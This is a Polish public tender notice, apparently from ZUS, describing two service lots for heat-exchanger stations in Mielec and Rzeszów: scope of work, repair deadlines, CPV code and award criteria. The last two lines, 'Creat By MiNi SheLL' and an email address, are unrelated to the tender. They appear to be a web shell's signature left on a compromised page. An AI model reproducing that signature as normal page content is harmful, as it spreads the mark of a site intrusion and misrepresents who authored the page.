<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Serwisowanie wymiennikowni w Inspektoracie ZUS w Mielcu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Zakres prac do wykonani podczas przeglądów konserwacyjnych wymienikowni ciepła (w części technologicznej , elektrycznej , aparatury kontrolno pomiarowej , automatyki ) 
1. Lokalizacja wymiennikowni wymiennikownia znajdująca się w Inspektoracie ZUS w Mielcu przy ul. Sikorskiego 4 ,
2.Wykonywanie  konserwacji  urządzeń  węzła  cieplnego  w zakresie: 
a) konserwacja elektronicznych  regulatorów  temperatury i czujników 
b) konserwacja siłowników elektrycznych, zaworów 
c) dobór nastaw regulatorów i kontroli prawidłowości działania  układów  regulacyjnych d) wymiana uszczelek przy  armaturze 
e) konserwacja instalacji elektrycznej siłowej i gniazd elektrycznych 
f) płukanie z oczyszczeniem wymienników ciepła 
3. W celu zapewnienia prawidłowego stanu technicznego  wymiennikowi ciepła przeglądy będą wykonywane 2 razy do roku: przed rozpoczęciem sezonu grzewczego i po jego zakończeniu, w ciągu 10 dni od daty pisemnego lub telefonicznego  powiadomienia przez Zamawiającego.Usuwanie awarii i naprawy będą wykonywane na podstawie oddzielnego zlecenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.11.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Serwisowanie wymiennikowni w O/ZUS w Rzeszowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie wykonywania konserwacji, serwisowania i usuwania awarii wymiennikowni, wewnętrznej instalacji c.o., znajdujących się w O/ZUS w Rzeszowie przy ulicy AL. Piłsudskiego 12 
1. Wymiennikownia ciepła  / w części technologicznej , elektrycznej, aparatury kontrolno-pomiarowej, automatyki / oraz instalacja wewnętrzna c.o.Lokalizacja wymiennikowni: Wymiennikownia ciepła  w  O/ZUS w Rzeszowie Al. Piłsudskiego 12   Zleceniobiorca w ramach wykonywania czynności musi zapewnić ciągłą /całodobową / sprawność wymiennikowni cieplnych /węzłów cieplnych / oraz  wewnętrznej instalacji centralnego ogrzewania. Przed przystąpieniem do okresu grzewczego i po jego zakończeniu
Zleceniobiorca zobowiązany jest do wykonania obowiązkowego przeglądu wymiennikowni, w ciągu 10 dni od daty pisemnego lub telefonicznego powiadomienia przez Zamawiającego.  
 2. Warunki napraw awaryjnych. 
2.1. W przypadku wystąpienia awarii, usterki wymiennikowni i instalacji wewnęcznej c.o. w czasie obowiązywania umowy będzie ona usuwana przez Zleceniodawcę w ciągu 24 godzin licząc od chwili zgłoszenia awarii, usterki przez Zleceniodawcę. W sytuacjach wyjątkowych za zgodą obu stron umowy dopuszcza się inny sposób załatwienia sprawy niż wyżej opisany. 
2.2. W przypadku awarii Zleceniobiorca zobowiązany jest zabezpieczyć miejsce jej wystąpienia w sposób uniemożliwiający zalewanie pomieszczenia, w którym ona nastąpiła jak i pomieszczeń narażonych na zalanie. 
2.3. Po usunięciu awarii, usterki Zleceniobiorca zagwarantuje prawidłowe parametry jakościowe działania urządzeń grzewczych wraz z osprzętem znajdującym się w kotłowni , wymiennikowni i wewnętrznej instalacji co. 
2.4. Na wymienione części Zleceniobiorca udzieli gwarancji w wymiarze podobnym przez producenta jednak nie mniejszym niż 12 miesięcy. 
2.5. Zleceniobiorca wykonanie czynności związanych z konserwacją, przeglądami lub naprawami potwierdzi odpowiednim protokołem. 
2.6. Datę wykonania przeglądu przed okresem grzewczym Zleceniodawca uzgodni z  pracownikami komórki Administracyjno -Gospodarczej w O/ZUS. 
3.   Zleceniodawca zapewni obecność swojego pracownika podczas wykonywania prac  związanych z realizacją umowy. Po godzinach pracy Zleceniodawcy wszystkie czynności związane z realizacją przedmiotu zamówienia będą wykonywane tylko w obecności upoważnionego pracownika Zleceniodawcy.   
4.  W trakcie wykonywania robót Zleceniobiorca zobowiązany jest do zabezpieczenia terenu prac przed zanieczyszczeniami i uszkodzeniami, i składania wszelkich urządzeń pomocniczych, zbędnych materiałów oraz odpadów i śmieci, związanych  z wykonywanymi pracami i usługami w miejscach wskazanych przez pracownika O/ZUS.   
5. Zleceniobiorca po skończeniu prac zobowiązany jest posprzątać teren robót, usunąć z obiektu i terenu prac wszystkie odpadki i opakowania pozostałe po wykonaniu robót. W przypadku nie posprzątania terenu robót, Zleceniodawca posprząta teren robót a  kosztami obciąży Zleceniodawcę. 
 6. Zleceniobiorca zobowiązany jest w ramach wynagrodzenia do prowadzenia analizy pracy wymiennikowni wraz z korektą  nastaw regulatorów temperatury. Korekta na specjalne życzenie Odbiorcy wykonana będzie odpłatnie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.11.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com